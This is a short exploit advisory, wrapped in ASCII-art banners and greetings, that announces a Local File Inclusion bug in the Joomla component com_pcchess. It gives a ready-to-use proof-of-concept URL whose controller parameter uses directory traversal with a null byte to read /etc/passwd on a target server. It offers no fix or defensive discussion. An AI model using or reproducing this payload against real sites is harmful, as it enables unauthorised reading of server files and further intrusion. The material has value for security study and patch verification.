================================================================================================ ================================================================================================ == @@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@ == == @@@@@@@@@@@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@@@@@@@@@@ == ==@@ @@@@ @@@@ @ @ @@@@@@@@ @@ @@ == ==@@ @@@@ @@@@@ @@@@@@@@@ @@ @@ == ==@@ @@@@@@@@@@@@@@@ @ @@@@@@@@@@@@ @@ @@@@@@ == ==@@ @@@@ @@@@ @@@@@@@@ @@ @@ == ==@@ @@@@ @@@@ @@@@@@@@ @@ @@ == ==@@ @@@@@@@@ @@@@ @@@@@@@@@@@@@@@@ @@ @@@@@@ == ==@@ @@@@@@@@ @@@@ @@ @@@@@@@@@@ @@@@@@@@@@@@@@ @@ @@@@@@ == == == ================================================================================================ ================================================================================================ |||||| ||| ||| [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[ [[ [[ [[ joomla Component com_pcchess Local File Inclusion Vulnerability [[ [[ [[ [[ ** Bugs Found by team_elite | http://manadocoding.net | http://www.gcc.web.id/ | [[ [[ [[ [[ ## Exploit: index.php?option=com_pcchess&controller=[LFI]%00 [[ [[ [[ [[ ## PoC: [[ [[ [[ [[- http://[target]/[path]/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 [[ [[ [[ [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[ ||| ||| ||| ||| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~Greetz and Thanks to: All member gcc, all member manadocoding ~~~~ ~~~~ ~~~~ ~~~~MC team : team_elite , devilbat , zreg ~~~~ ~~~~thanks for : cr4wl3r ~~~~ ~~~~ ~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * -, * -@@ * -@@# * -:@@; * - @@@@@......` * -@@@@.@@@@@@@@@@@# * - @@@@@@@@@@@@@@@@@@` * - @@@@@@@@@@@@@@@@@@@@; * -#@@@@@@@@@@@@@@@@@ * -`@@,@@@@@@@@@@@@@@@@@: * - @@@+@@@@@@@ @@@@@@@;@@@` * - :@@@@@@@@@:@,; @@@@@@@ .@@ * -@@@@@@@@@@@:@@@@@@@@@@ * - @@@@' ` ` @@@@@@@@@:+. * - .@@@@@@@@@@@@@ . * - , +@@@@@@@@@@@@@ * -+@@@@@@@@@@@@@@@@@@@@# * - ,@@@@@@@@@@@@@@@@@ +@@@ * -`@@@@@@@@@@@@@@@@@@@ @@@ * - @@@@@@@@@@@@@@@@@@@ @@` * -@@@@@@@@@@@@@@@@@@ @@ * - +@@@@@@@@@@; @@@# @ * - @@@@@@@@@ : * - @@@@@@@@ ,@@ * -@@@@@@@@@ @@@' * -@@@@@@@`@ @@@; * -@@@@@@@@ @.@@@@@@@@ * -@@@@@@@@@@@@@@@@@@@@@@# * - @@@@@@@@@@@@@@@@@@@@@@@@@@@ * - @ @@@@@@@ ;@@@@@@@@@@@@@@@@@ * - @ @@@@@@@@@@@@@@@@@@@,@@@@+ * - @@@@@@@@@@@@@@@@@@@@@@@ * - @@@ @@@@@@@@@@@@@@@; @@@@ * - @@@@@@@@@`@@@. @@. * - @@; @@@@#:@@@@@# @@. * - @ @@@: ;@ * -;` @@ ;@ * -@@@ * - @# * - : : * --------------------------------------------->>>> bugs found on 08 April 2010 by team_elite.
体验盒子
